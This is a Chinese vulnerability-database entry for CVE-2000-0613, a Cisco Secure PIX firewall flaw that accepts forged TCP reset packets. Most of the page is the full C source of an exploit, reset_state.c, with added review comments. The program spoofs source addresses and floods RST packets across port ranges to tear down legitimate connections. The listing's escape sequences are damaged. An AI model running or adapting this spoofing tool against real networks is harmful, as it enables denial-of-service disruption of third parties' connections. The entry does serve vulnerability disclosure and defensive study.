Cisco Secure PIX防火墙伪造TCP RST漏洞

Cisco Secure PIX防火墙伪造TCP RST漏洞

漏洞ID 1105912 漏洞类型 访问验证错误
发布时间 2000-07-10 更新时间 2005-07-27
CVE编号 CVE-2000-0613
CNNVD-ID CNNVD-200003-038
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-038
|漏洞详情
Cisco Secure PIX防火墙存在漏洞,不能正确辨识伪造的TCP重置包(RST),远程攻击者可以利用这个漏洞迫使防火墙关闭合法连接。
|漏洞EXP
source: http://www.securityfocus.com/bid/1454/info

A connection through a Cisco Secure PIX Firewall can be reset by a third party if the source and destination IP addresses and ports of the connection can be determined or inferred. This can be accomplished by sending a forged TCP Reset (RST) packet to the firewall, containing the same source and destination addresses and ports (in the TCP packet header) as the connection to be disrupted. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this.


/* reset_state.c (c) 2000 Citec Network Securities */
/* The code following below is copyright Citec Network Securities */
/* Code was developed for testing, and is written to compile under */
/* FreeBSD */

#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>

struct slist {
	struct in_addr  spoof;		/* One source address parsed from the spoof file */
	struct slist   *link;		/* Next node; NULL on the trailing, never-filled node */
};					/* Spoof list: singly linked, built and walked in main() */

int
main(int argc, char *argv[])
{
	/*
	 * Entry point.  Reads one IPv4 address per line from the spoof file
	 * (argv[1]) into a singly linked list, opens a raw IPv4 socket with
	 * IP_HDRINCL, prepares a single IP+TCP header buffer whose only TCP
	 * flag is RST, and for every listed address iterates the source-port
	 * and destination-port ranges given on the command line, calling
	 * sendto() once per (source port, destination port) pair toward
	 * argv[2].  Always returns 1.
	 *
	 * Reading note: the "\n" escapes in this listing's string literals
	 * have lost their backslash (a bare "n" remains).  The literals are
	 * reproduced exactly as found on the page.
	 */

	int i, int2;			/* Loop counters: source port, dest port */
	int             sock;		/* Raw socket descriptor */
	int             on = 1;		/* setsockopt() value for IP_HDRINCL */
	struct sockaddr_in sockstruct;	/* sendto() address; only sin_family,
					 * sin_port and sin_addr are ever set */
	struct ip      *iphead;		/* IP Header pointer (into evilpacket) */
	struct tcphdr  *tcphead;	/* TCP Header pointer (into evilpacket) */
	char            evilpacket[sizeof(struct ip) + sizeof(struct
tcphdr)];
					/* The one packet buffer, reused for
					 * every send; header only, no payload */
	int             seq, ack;	/* Sequence and Acknowledgement #'s,
					 * pseudo-random (see loop below) */
	FILE           *spooffile;	/* Spoof file */
	char           *buffer;		/* Spoof file read buffer (25 bytes) */
	struct slist   *scur, *sfirst;	/* Spoof linked list pointers */
	char src[20], dst[20];		/* Work around for inet_ntoa static
					 * buffer when using printf() */
	int sourcefrom, sourceto, destfrom, destto;	/* CMD Line ports */
	int target;			/* Unused: never assigned or read */


	if(argc < 6) {
		fprintf(stderr, "Usage: %s spoof_file target sps spe dps
dpen"
		"target = your victimn"
		"sps = Source port startn"
		"spe = Source port endn"
		"dps = Destination port startn"
		"dpe = Destination port endn", argv[0]);
		exit(-1);
		}
	else {
		sourcefrom = atoi(argv[3]);	/* atoi(): no error reporting */
		sourceto = atoi(argv[4]);
		destfrom = atoi(argv[5]);
		destto = atoi(argv[6]);
		};
	
	if(sourcefrom > sourceto) {
		printf("Error, start source port must be less than end
source portn");
		exit(-1);
		}
	else if(destfrom > destto) {
		printf("Error, start dest port must be less than end dest
portn");
		exit(-1);
		};		/* Only the ordering is checked; the values are
				 * never range-checked against 0..65535 */

	printf("Used spoof file %sn"
	       "Destination: [%s] ports: [%d -> %d]n"
	       "Target source ports: [%d -> %d]n",
		argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);

	sleep(1);

	bzero(evilpacket, sizeof(evilpacket));
					/* Clean our reset packet: every field
					 * not assigned below (notably th_sum
					 * and th_urp) stays zero for the whole
					 * run -- a zero TCP checksum is an
					 * observable property of these packets */

	sfirst = malloc(sizeof(struct slist));	/* Unchecked allocation */
	scur = sfirst;
	scur->link = NULL;		/* Setup our spoof linked list */

	if(!(buffer = malloc(25))) {
		perror("malloc");
		exit(-1);
		};			/* Allocate for read buffer */

	if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
		perror("fopen");	/* Note: a FILE * is compared with "<= 0" */
		exit(-1);		/* Open our spoof file */
	} else {
		while (fgets(buffer, 25, spooffile)) { 	/* Read till EOF */
			if (!(inet_aton(buffer, &(scur->spoof))))
				printf("Invalid address found in victim
file.. ignoringn");
			else {
				scur->link = malloc(sizeof(struct slist));
				scur = scur->link;
				scur->link = NULL;	/* Cycle l.list: a fresh,
							 * still-empty tail node is
							 * always kept ready; the
							 * send loop stops there */
				}
			};		/* End of while loop */
		};		/* End of if {} else {} */
	

	free(buffer);			/* Free up our read buffer */
	fclose(spooffile);		/* Close our spoof file */
	scur = sfirst;			/* Rewind to the first spoof entry */

	if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("socket");
		exit(-1);
	}				/* Allocate our raw socket (ordinarily a
					 * privileged operation on Unix-like
					 * systems) */

	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on,
sizeof(on)) < 0) {
		perror("setsockopt");
		exit(-1);
	}				/* IP_HDRINCL: the IP header built in
					 * evilpacket is handed to the kernel
					 * as-is */

	sockstruct.sin_family = AF_INET;
	iphead = (struct ip *) evilpacket;
	tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
					/* Overlay ip and tcp headers on the
					 * char buffer; nothing here guarantees
					 * the alignment these structs want */

	iphead->ip_hl = 5;		/* Ip header length is 5 words (20 bytes) */
	iphead->ip_v = 4;		/* ipv4 */
	iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
					/* Length of our total packet, left in
					 * host byte order -- whether the kernel
					 * expects that is a raw-socket
					 * convention of the platform (written
					 * for FreeBSD); TODO confirm */
	iphead->ip_id = htons(getpid());	/* Packet ID == PID #, constant
						 * for the whole run */
	iphead->ip_ttl = 255;			/* Time to live == 255 */
	iphead->ip_p = IPPROTO_TCP;		/* TCP Packet */
	iphead->ip_sum = 0;			/* IP checksum not computed here */
	iphead->ip_tos = 0;			/* 0 Type of Service */
	iphead->ip_off = 0;			/* Offset is 0 */
	tcphead->th_win = htons(512);		/* TCP Window is 512, constant */
	tcphead->th_flags = TH_RST;		/* Reset packet: RST alone, ACK
						 * flag is not set */
	tcphead->th_off = 0x50;			/* NOTE(review): if th_off is the
						 * 4-bit bitfield of this
						 * platform's struct tcphdr, 0x50
						 * stores 0, i.e. a data offset
						 * of 0 -- a malformed-TCP trait
						 * a filter or IDS can key on */

	iphead->ip_dst.s_addr = inet_addr(argv[2]);	/* Unchecked: yields
							 * INADDR_NONE on a bad
							 * address */

	srand(getpid());			/* Seed for rand() with the PID */
	while (scur->link != NULL) {		/* Ends at the empty tail node,
						 * which is never used */
		seq = rand() % time(NULL);	/* Randomize our #'s */
		ack = rand() % time(NULL);	/* Randomize ack #'s */
		sockstruct.sin_port = htons(rand() % time(NULL));
						/* Port in the sendto() address
						 * only; the TCP ports go into
						 * tcphead below */
		iphead->ip_src = scur->spoof;	/* Set the spoofed address */
		sockstruct.sin_addr = scur->spoof;
						/* NOTE(review): the sendto()
						 * address carries the spoofed
						 * *source*, while the packet's
						 * ip_dst is argv[2]; which one a
						 * raw IP_HDRINCL socket routes
						 * on is platform-specific --
						 * TODO confirm */
		for(i = sourcefrom; i <= sourceto; i++) {
			for(int2 = destfrom; int2 <= destto; int2++) {
				usleep(2);	/* usleep() takes microseconds:
						 * 2 us, not the 5 ms the
						 * original comment claimed */
				seq += (rand() %10)+250;
				ack += (rand() %10)+250;
						/* Walk seq/ack upward by a
						 * small random step per packet */
				tcphead->th_seq = htonl(seq);
						/* Set sequence number */
				tcphead->th_ack = htonl(ack);
						/* Set ack number (filled even
						 * though TH_ACK is not set) */
				tcphead->th_dport = htons(int2);
						/* Set destination port */
				tcphead->th_sport = htons(i);
						/* Set source port */
				snprintf(src, 20, "%s",
inet_ntoa(iphead->ip_src));
				snprintf(dst, 20, "%s",
inet_ntoa(iphead->ip_dst));
				/* Copy info to src and dst for printing */
				printf("TCP RESET: [%s:%d] -> [%s:%d]n",
src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
				sendto(sock, &evilpacket,
sizeof(evilpacket), 0x0,
			       		(struct sockaddr *) & sockstruct,
sizeof(sockstruct));
						/* Send the packet; the return
						 * value is not checked */
				};
			};
		scur = scur->link;		/* Cycle the spoof ips */
		}
		scur = sfirst;			/* The list is never freed and the
						 * socket is never closed */
	return (1);			/* Exit status 1 even on success */

};
|参考资料

来源:BUGTRAQ
名称:20000320 PIX DMZ Denial of Service - TCP Resets
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:XF
名称:cisco-pix-firewall-tcp
链接:http://xforce.iss.net/static/4928.php
来源:BID
名称:1454
链接:http://www.securityfocus.com/bid/1454
来源:OSVDB
名称:1457
链接:http://www.osvdb.org/1457
来源:CISCO
名称:20000711 Cisco Secure PIX Firewall TCP Reset Vulnerability
链接:http://www.cisco.com/warp/public/707/pixtcpreset-pub.shtml
